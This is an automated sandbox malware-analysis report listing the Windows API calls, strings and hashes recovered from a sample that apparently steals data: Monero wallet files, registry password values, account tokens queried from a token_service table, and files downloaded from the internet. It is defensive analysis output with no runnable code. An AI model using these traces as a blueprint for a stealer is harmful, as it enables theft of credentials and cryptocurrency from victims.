                                      • Part of subcall function 00949AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949AEF
                                      • Part of subcall function 00949AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00944EEE,00000000,?), ref: 00949B01
                                      • Part of subcall function 00949AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00944EEE,00000000,00000000), ref: 00949B2A
                                      • Part of subcall function 00949AC0: LocalFree.KERNEL32(?,?,?,?,00944EEE,00000000,?), ref: 00949B3F
                                    • lstrcat.KERNEL32(?,00000000), ref: 009544A3
                                    • StrCmpCA.SHLWAPI(?,009608D1), ref: 009544C0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 009544D2
                                    • lstrcat.KERNEL32(00000000,?), ref: 009544E5
                                    • lstrcat.KERNEL32(00000000,00960FB8), ref: 009544F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-0
                                    • Opcode ID: 260e599b7cb8de9bac6966414da17514dda595392be7a99fbd51677d5c337d97
                                    • Instruction ID: 4d714e2efc3a2915f53a9af3253f9e1978087c302bf16d16499037e45e025a86
                                    • Opcode Fuzzy Hash: 260e599b7cb8de9bac6966414da17514dda595392be7a99fbd51677d5c337d97
                                    • Instruction Fuzzy Hash: B87167B6900208ABDB14EBB0DC85FEE737DAB88301F004599F605A7191EE34DB49CFA1
                                    APIs
                                      • Part of subcall function 009412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009412B4
                                      • Part of subcall function 009412A0: RtlAllocateHeap.NTDLL(00000000), ref: 009412BB
                                      • Part of subcall function 009412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009412D7
                                      • Part of subcall function 009412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009412F5
                                      • Part of subcall function 009412A0: RegCloseKey.ADVAPI32(?), ref: 009412FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0094134F
                                    • lstrlen.KERNEL32(?), ref: 0094135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00941377
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 00958B60: GetSystemTime.KERNEL32(00960E1A,015E9D28,009605AE,?,?,009413F9,?,0000001A,00960E1A,00000000,?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 00958B86
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00941465
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009499EC
                                      • Part of subcall function 009499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00949A11
                                      • Part of subcall function 009499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00949A31
                                      • Part of subcall function 009499C0: ReadFile.KERNEL32(000000FF,?,00000000,0094148F,00000000), ref: 00949A5A
                                      • Part of subcall function 009499C0: LocalFree.KERNEL32(0094148F), ref: 00949A90
                                      • Part of subcall function 009499C0: CloseHandle.KERNEL32(000000FF), ref: 00949A9A
                                    • DeleteFileA.KERNEL32(00000000), ref: 009414EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: f59920b106a173fed370a540e6121113615555b1e2b5888dcb7efd97f0f8dd3c
                                    • Instruction ID: 67b38b1b9bef7dac3221fbd02abd080380395a0179c457906157a21b28fff4ce
                                    • Opcode Fuzzy Hash: f59920b106a173fed370a540e6121113615555b1e2b5888dcb7efd97f0f8dd3c
                                    • Instruction Fuzzy Hash: 605146B1D5011957CB15FB61DD92FED733CAF94301F404298B60A62091EE346B8DCFAA
                                    APIs
                                      • Part of subcall function 009472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0094733A
                                      • Part of subcall function 009472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009473B1
                                      • Part of subcall function 009472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0094740D
                                      • Part of subcall function 009472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00947452
                                      • Part of subcall function 009472D0: HeapFree.KERNEL32(00000000), ref: 00947459
                                    • lstrcat.KERNEL32(00000000,009617FC), ref: 00947606
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00947648
                                    • lstrcat.KERNEL32(00000000, : ), ref: 0094765A
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0094768F
                                    • lstrcat.KERNEL32(00000000,00961804), ref: 009476A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 009476D3
                                    • lstrcat.KERNEL32(00000000,00961808), ref: 009476ED
                                    • task.LIBCPMTD ref: 009476FB
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: f2906ed3f7b199a37f13284251a9dc1ad1767ef6dd5c94b540d0d5c79259a6b5
                                    • Instruction ID: e485f15f8fff3e936665d917b826eda8acba727c94f2776a08e09e31f4fae675
                                    • Opcode Fuzzy Hash: f2906ed3f7b199a37f13284251a9dc1ad1767ef6dd5c94b540d0d5c79259a6b5
                                    • Instruction Fuzzy Hash: 83314B71900109DBDB04EBE4DC85EEF7379BB89701B144519F102A72A1EF34A946CB62
                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00944839
                                      • Part of subcall function 009447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00944849
                                    • InternetOpenA.WININET(00960DF7,00000001,00000000,00000000,00000000), ref: 0094610F
                                    • StrCmpCA.SHLWAPI(?,015EE590), ref: 00946147
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0094618F
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 009461B3
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 009461DC
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0094620A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00946249
                                    • InternetCloseHandle.WININET(?), ref: 00946253
                                    • InternetCloseHandle.WININET(00000000), ref: 00946260
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: bf32fed0ec004b03e6e79da7941499ea375ae1705e7ced5542430eca6732adaf
                                    • Instruction ID: e5b7efde2e318d082ad448b8290de54fe42fd725c3c885c3a34f76610548591b
                                    • Opcode Fuzzy Hash: bf32fed0ec004b03e6e79da7941499ea375ae1705e7ced5542430eca6732adaf
                                    • Instruction Fuzzy Hash: 5E5170B1900218ABEB20DFA0DC45FEE77B8FB44701F108599B605A71D1DBB46E89CF96
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0094733A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009473B1
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0094740D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00947452
                                    • HeapFree.KERNEL32(00000000), ref: 00947459
                                    • task.LIBCPMTD ref: 00947555
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: b4258d09b90794c749f6a3e57399fa13bbb00124b4d8f1d581e39669e7e8b16d
                                    • Instruction ID: 9731b12e4086ae57804c57c80ad53572ef5eb70857fe3be648c6d17f8ca7f038
                                    • Opcode Fuzzy Hash: b4258d09b90794c749f6a3e57399fa13bbb00124b4d8f1d581e39669e7e8b16d
                                    • Instruction Fuzzy Hash: 046119B591426C9BDB24DB50CC55FEAB7B8BF88300F0085E9E649A6141DBB05BC9CFA1
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                    • lstrlen.KERNEL32(00000000), ref: 0094BC9F
                                      • Part of subcall function 00958E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00958E52
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0094BCCD
                                    • lstrlen.KERNEL32(00000000), ref: 0094BDA5
                                    • lstrlen.KERNEL32(00000000), ref: 0094BDB9
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 28e11473b8019a874cbb81ad372297c3fbc83fcd01fa83997c50b93d5e7d75f3
                                    • Instruction ID: 2db118deb4910516b37c8f39ea040fd7176de19e09cc400df7d7d54878480cf4
                                    • Opcode Fuzzy Hash: 28e11473b8019a874cbb81ad372297c3fbc83fcd01fa83997c50b93d5e7d75f3
                                    • Instruction Fuzzy Hash: D0B13E719101189BDB04FBA1DC96FEE7338BF94301F444259F906A71A1EF346A4DCBAA
                                    APIs
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 4e399b7b5e2fae38d5539098cf7d36e233ceb545744ab1aa2412fc8f7c643289
                                    • Instruction ID: acb9767d3e5abf2b5e029b8faebfb547a12015ade630fefdf7fa9858263db58f
                                    • Opcode Fuzzy Hash: 4e399b7b5e2fae38d5539098cf7d36e233ceb545744ab1aa2412fc8f7c643289
                                    • Instruction Fuzzy Hash: BFF05E34908209EFE3449FE1E90972CBB70FB08703F04019AE609872A0DA785F41EB96
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00944FCA
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00944FD1
                                    • InternetOpenA.WININET(00960DDF,00000000,00000000,00000000,00000000), ref: 00944FEA
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00945011
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00945041
                                    • InternetCloseHandle.WININET(?), ref: 009450B9
                                    • InternetCloseHandle.WININET(?), ref: 009450C6
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: 3ec19255a353ece7e537f118e6e0056689388b5aa72c1d4908c14d1e3cc5144e
                                    • Instruction ID: 4e426964d76d5ead6e82a1d49c6445e04dff0d161d6fd49914a3f2a26059cba6
                                    • Opcode Fuzzy Hash: 3ec19255a353ece7e537f118e6e0056689388b5aa72c1d4908c14d1e3cc5144e
                                    • Instruction Fuzzy Hash: B33106B4A00218ABDB20CF94DC85BDDB7B4EB48704F5081D9EB09A7291DB746E85CF99
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015EDB20,00000000,?,00960E2C,00000000,?,00000000), ref: 00958130
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00958137
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00958158
                                    • wsprintfA.USER32 ref: 009581AC
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2922868504-3474575989
                                    • Opcode ID: 26a46ecce49cee3d3e81fc5e7fe1be2d8667a5fae2427e1a9a5d8ca3362e2d83
                                    • Instruction ID: c85054cc9061724b37bddece771a34dac937c4e59322acaff86ab6c538a0914d
                                    • Opcode Fuzzy Hash: 26a46ecce49cee3d3e81fc5e7fe1be2d8667a5fae2427e1a9a5d8ca3362e2d83
                                    • Instruction Fuzzy Hash: 2E212EB1E44218ABEB10DFD5CC49FAFB7B8FB44B15F104509F605BB280DB7859058BA5
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00958426
                                    • wsprintfA.USER32 ref: 00958459
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0095847B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0095848C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00958499
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                    • RegQueryValueExA.ADVAPI32(00000000,015EDB50,00000000,000F003F,?,00000400), ref: 009584EC
                                    • lstrlen.KERNEL32(?), ref: 00958501
                                    • RegQueryValueExA.ADVAPI32(00000000,015EDCA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00960B34), ref: 00958599
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00958608
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0095861A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
                                    • Opcode ID: ac7c45338cf9ee90e58144350067d9abc152e368cad18333dd35747fe5be8cf8
                                    • Instruction ID: cee412f3465483a6e982909fcc4bfac39a92aa6511298420ca5609279d29297f
                                    • Opcode Fuzzy Hash: ac7c45338cf9ee90e58144350067d9abc152e368cad18333dd35747fe5be8cf8
                                    • Instruction Fuzzy Hash: 07211BB19102189BEB24DB54DC85FE9B3B8FB48701F00C5D9E609A7190DF75AA85CFE4
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009576A4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 009576AB
                                    • RegOpenKeyExA.ADVAPI32(80000002,015DB7A8,00000000,00020119,00000000), ref: 009576DD
                                    • RegQueryValueExA.ADVAPI32(00000000,015EDE08,00000000,00000000,?,000000FF), ref: 009576FE
                                    • RegCloseKey.ADVAPI32(00000000), ref: 00957708
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11
                                    • API String ID: 3225020163-2517555085
                                    • Opcode ID: f432a3ee74bab800d78637fd3a8a2cb13f1e9045fb69fce16e9af016deadd886
                                    • Instruction ID: 488c5aa5f6a8493d79c3f246e6c9d290610a2f861bb1bd4a581d494b0af3f713
                                    • Opcode Fuzzy Hash: f432a3ee74bab800d78637fd3a8a2cb13f1e9045fb69fce16e9af016deadd886
                                    • Instruction Fuzzy Hash: 91014FB5A04304BBEB00DBE5EC49F6AB7BCEB48701F104455FE04972A0EA749A04CB61
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957734
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0095773B
                                    • RegOpenKeyExA.ADVAPI32(80000002,015DB7A8,00000000,00020119,009576B9), ref: 0095775B
                                    • RegQueryValueExA.ADVAPI32(009576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0095777A
                                    • RegCloseKey.ADVAPI32(009576B9), ref: 00957784
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 7616cc022dca427d8fd97e1a8e2f7054dad8cb83f6d2fbff320e7468c21437ea
                                    • Instruction ID: f1a499277e3072dd450651bea3495f1d5e4ed5786531fb386c1ba75d4ffbf6a9
                                    • Opcode Fuzzy Hash: 7616cc022dca427d8fd97e1a8e2f7054dad8cb83f6d2fbff320e7468c21437ea
                                    • Instruction Fuzzy Hash: 2A0117B9A40308BBE700DBE4DC49FAEB7B8EB48705F104555FA05A7291DA745A04CB61
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009499EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00949A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00949A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,0094148F,00000000), ref: 00949A5A
                                    • LocalFree.KERNEL32(0094148F), ref: 00949A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00949A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 8072e2c8defae77b3cac3b5ea810d88338b108485bf4024978a4381feba364e7
                                    • Instruction ID: bbf619b944364765def30f9c11d6147a5dca2a28490d4112520359f5671771c8
                                    • Opcode Fuzzy Hash: 8072e2c8defae77b3cac3b5ea810d88338b108485bf4024978a4381feba364e7
                                    • Instruction Fuzzy Hash: A2312BB4A00209EFDF14CF94C985FAE77B9FF48341F108159E911A72A0DB78AA41CFA1
                                    APIs
                                    • lstrcat.KERNEL32(?,015EDE68), ref: 009547DB
                                      • Part of subcall function 00958DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00958E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954801
                                    • lstrcat.KERNEL32(?,?), ref: 00954820
                                    • lstrcat.KERNEL32(?,?), ref: 00954834
                                    • lstrcat.KERNEL32(?,015DB1A8), ref: 00954847
                                    • lstrcat.KERNEL32(?,?), ref: 0095485B
                                    • lstrcat.KERNEL32(?,015ED038), ref: 0095486F
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 00958D90: GetFileAttributesA.KERNEL32(00000000,?,00941B54,?,?,0096564C,?,?,00960E1F), ref: 00958D9F
                                      • Part of subcall function 00954570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00954580
                                      • Part of subcall function 00954570: RtlAllocateHeap.NTDLL(00000000), ref: 00954587
                                      • Part of subcall function 00954570: wsprintfA.USER32 ref: 009545A6
                                      • Part of subcall function 00954570: FindFirstFileA.KERNEL32(?,?), ref: 009545BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 983bf6f25e42a30b1a0d02514fae3bf4067935cd6227c1035233b60aa10df8a6
                                    • Instruction ID: a6db1f9bf260ffdc88fdfc4cffcdb503b8ddbcf2e3c3e4549b3ec9d58358368d
                                    • Opcode Fuzzy Hash: 983bf6f25e42a30b1a0d02514fae3bf4067935cd6227c1035233b60aa10df8a6
